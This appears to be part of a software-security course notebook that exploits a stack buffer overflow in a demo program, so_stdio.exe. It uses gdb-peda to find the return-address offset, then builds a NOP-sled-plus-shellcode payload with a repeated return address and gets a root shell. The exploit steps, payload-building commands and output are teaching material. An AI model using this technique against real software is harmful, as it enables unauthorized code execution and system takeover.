Give me some text: Acknowledged: AAA%AAsAABAA$AAnAACAA-AA(AADAA;AA)AAEAAaAA0AAFAAbAA1AAGAAcAA2AAHAAdAA3AAIAAeAA4AAJAAfAA5AAKAAgAA6AALAAhAA7AAMAAiAA8AANAAjAA9AAOAAkAAPAAlAAQAAmAARAAoAASAApAATAAqAAUAArAAVAAtAAWAAuAAXAAvAAYAAwAAZAAxAAyA with length 200

Program received signal SIGSEGV, Segmentation fault.
Use 'set logging enabled off'.

Use 'set logging enabled on'.

[----------------------------------registers-----------------------------------]
EAX: 0xf7e23c40 --> 0xf7e20970 --> 0xf7d1b8c0 (<_ZNSoD1Ev>:	endbr32)
EBX: 0x41416b41 ('AkAA')
ECX: 0xf7a1e9b8 --> 0x0 
EDX: 0xf7e20970 --> 0xf7d1b8c0 (<_ZNSoD1Ev>:	endbr32)
ESI: 0x6c414150 ('PAAl')
EDI: 0xf7ffcb80 --> 0x0 
EBP: 0x41514141 ('AAQA')
ESP: 0xffffbd50 ("RAAoAASAApAATAAqAAUAArAAVAAtAAWAAuAAXAAvAAYAAwAAZAAxAAyA")
EIP: 0x41416d41 ('AmAA')
EF

#### Manually using gdb-peda

```bash
(base) ┌──(kali㉿kali)-[~/projects/SoftwareSecurity]
└─$ gdb -q ./so_stdio.exe 
Reading symbols from ./so_stdio.exe...

```

- since the program reads the data from standard input, we need to pipe the cyclic pattern from a file

```bash
(base) ┌──(kali㉿kali)-[~/projects/SoftwareSecurity]
└─$ gdb -q ./so_stdio.exe 
Reading symbols from ./so_stdio.exe...
gdb-peda$ pattern create 200 pattern.txt
Writing pattern of 200 chars to filename "pattern.txt"

gdb-peda$ run < pattern.txt 
Starting program: /home/kali/projects/SoftwareSecurity/so_stdio.exe < pattern.txt
[Thread debugging using libthread_db enabled]
Using host libthread_db library "/lib/x86_64-linux-gnu/libthread_db.so.1".
buffer is at 0xffffbd90
Give me some text: Acknowledged: AAA%AAsAABAA$AAnAACAA-AA(AADAA;AA)AAEAAaAA0AAFAAbAA1AAGAAcAA2AAHAAdAA3AAIAAeAA4AAJAAfAA5AAKAAgAA6AALAAhAA7AAMAAiAA8AANAAjAA9AAOAAkAAPAAlAAQAAmAARAAoAASAApAATAAqAAUAArAAVAAtAAWAAuAAXAAvAAYAAwAAZAAxAAyA with length 200

Program received signal SIGSEGV, Segmentation fault.
Warning: 'set logging off', an alias for the command 'set logging enabled', is deprecated.
Use 'set logging enabled off'.

Warning: 'set logging on', an alias for the command 'set logging enabled', is deprecated.
Use 'set logging enabled on'.

[----------------------------------registers-----------------------------------]
EAX: 0xf7e23c40 --> 0xf7e20970 --> 0xf7d1b8c0 (<_ZNSoD1Ev>:     endbr32)
EBX: 0x41416b41 ('AkAA')
ECX: 0xf7a1e9b8 --> 0x0 
EDX: 0xf7e20970 --> 0xf7d1b8c0 (<_ZNSoD1Ev>:    endbr32)
ESI: 0x6c414150 ('PAAl')
EDI: 0xf7ffcb80 --> 0x0 
EBP: 0x41514141 ('AAQA')
ESP: 0xffffbe20 ("RAAoAASAApAATAAqAAUAArAAVAAtAAWAAuAAXAAvAAYAAwAAZAAxAAyA")
EIP: 0x41416d41 ('AmAA')
EFLAGS: 0x10286 (carry PARITY adjust zero SIGN trap INTERRUPT direction overflow)
[-------------------------------------code-------------------------------------]
Invalid $PC address: 0x41416d41
[------------------------------------stack-------------------------------------]
0000| 0xffffbe20 ("RAAoAASAApAATAAqAAUAArAAVAAtAAWAAuAAXAAvAAYAAwAAZAAxAAyA")
0004| 0xffffbe24 ("AASAApAATAAqAAUAArAAVAAtAAWAAuAAXAAvAAYAAwAAZAAxAAyA")
0008| 0xffffbe28 ("ApAATAAqAAUAArAAVAAtAAWAAuAAXAAvAAYAAwAAZAAxAAyA")
0012| 0xffffbe2c ("TAAqAAUAArAAVAAtAAWAAuAAXAAvAAYAAwAAZAAxAAyA")
0016| 0xffffbe30 ("AAUAArAAVAAtAAWAAuAAXAAvAAYAAwAAZAAxAAyA")
0020| 0xffffbe34 ("ArAAVAAtAAWAAuAAXAAvAAYAAwAAZAAxAAyA")
0024| 0xffffbe38 ("VAAtAAWAAuAAXAAvAAYAAwAAZAAxAAyA")
0028| 0xffffbe3c ("AAWAAuAAXAAvAAYAAwAAZAAxAAyA")
[------------------------------------------------------------------------------]
Legend: code, data, rodata, value
Stopped reason: SIGSEGV
0x41416d41 in ?? ()


```
- now let's search for pattern to find the offset

```bash
gdb-peda$ patts

gdb-peda$ patts
Registers contain pattern buffer:
EBX+0 found at offset: 128
EBP+0 found at offset: 136
ESI+0 found at offset: 132
EIP+0 found at offset: 140
Registers point to pattern buffer:
[ESP] --> offset 144 - size ~56
Pattern buffer found at:
0x08051bbe : offset    0 - size  200 ([heap])
0x08051fc0 : offset    0 - size  200 ([heap])
0xf7fa70b9 : offset 33208 - size    4 (/usr/lib32/libm.so.6)
0xffffbd90 : offset    0 - size  200 ($sp + -0x90 [-36 dwords])
References to pattern buffer found at:
0xf7a1d624 : 0x08051fc0 (/usr/lib32/libc.so.6)
0xf7a1d628 : 0x08051fc0 (/usr/lib32/libc.so.6)
0xf7a1d62c : 0x08051fc0 (/usr/lib32/libc.so.6)
0xf7a1d630 : 0x08051fc0 (/usr/lib32/libc.so.6)
0xf7a1d634 : 0x08051fc0 (/usr/lib32/libc.so.6)
0xf7a1d638 : 0x08051fc0 (/usr/lib32/libc.so.6)
0xf7a1d63c : 0x08051fc0 (/usr/lib32/libc.so.6)
0xffffb8c8 : 0xffffbd90 ($sp + -0x558 [-342 dwords])


```

- so, the buffer length is **144 bytes** to completely overwrite the caller's return address
- next, we need to find the base address of buffer whose location doesn't change with the size of stadard input data provided to the program 
- the base address of buffer is conveniently printed

- create the payload in the form
```
| NOP sled | shellcode | repeated return address |
```
- we need to do some math to figure out the length of NOP sled and repeated return address we need to make the total payload length to be **144 bytes**
- user shellcode size is fixed, let's copy and see the size

In [35]:
! cp ../shellcodes/shellcode.bin .

In [36]:
! wc -c shellcode.bin

24 shellcode.bin


In [37]:
# this leaves us with
print(144-24)

120


- since we've 120 bytes, let's use 10 repeated return address just in case
- with the repeated return address length = `10 * 4 = 40`

In [63]:
# NOP sled length
print(120-40)

80


- so we can use 80 NOP bytes as sled to slide down to our shellcode
- now we have all the numbers we need to create our 144 long payload with shellcode

In [64]:
! python -c 'import sys; sys.stdout.buffer.write(b"\x90"*80)' > stdio_payload.bin

In [65]:
! wc -c stdio_payload.bin

80 stdio_payload.bin


In [66]:
! cat shellcode.bin >> stdio_payload.bin

In [67]:
! wc -c stdio_payload.bin

104 stdio_payload.bin


- we need to get the buffer's address from the terminal, not from the Jupyter Notebook!

```bash
┌──(kali㉿kali)-[~/projects/SoftwareSecurity/demos/stack_overflow]
└─$ python -c 'print("A"*10)' | ./so_stdio.exe 
buffer is at 0xffffbe00
Give me some text: Acknowledged: AAAAAAAAAA with length 10
Good bye!
```

In [68]:
! python -c 'import sys; sys.stdout.buffer.write(b"\x00\xbe\xff\xff"*10)' >> stdio_payload.bin

In [69]:
! wc -c stdio_payload.bin

144 stdio_payload.bin


- payload is ready and let's send it to the target program from the terminal
- note the - (hyphen) after cat command is required to make the shell interactive
- we don't get a prompt but an accessible terminal; just write some commands such as `whoami`, `ls`, etc.

```bash
┌──(kali㉿kali)-[~/projects/SoftwareSecurity/demos/stack_overflow]
└─$ python -c 'print("A"*10)' | ./so_stdio.exe 
buffer is at 0xffffbe00
Give me some text: Acknowledged: AAAAAAAAAA with length 10
Good bye!
                                                                                                
(base) ┌──(kali㉿kali)-[~/projects/SoftwareSecurity]
└─$ cat stdio_payload.bin - | ./so_stdio.exe 
buffer is at 0xffffbe00
Give me some text: hello
Acknowledged: ��������������������������������������������������������������������������������1�Ph//shh/bin��1ɉ�j
                 X with length 104
whoami
root
date
Wed Mar 29 11:06:51 EDT 2023
exit
```

## Use pwntools library to automate everything

- see examples under pwntools tutorial chapter
- rest left as an exercise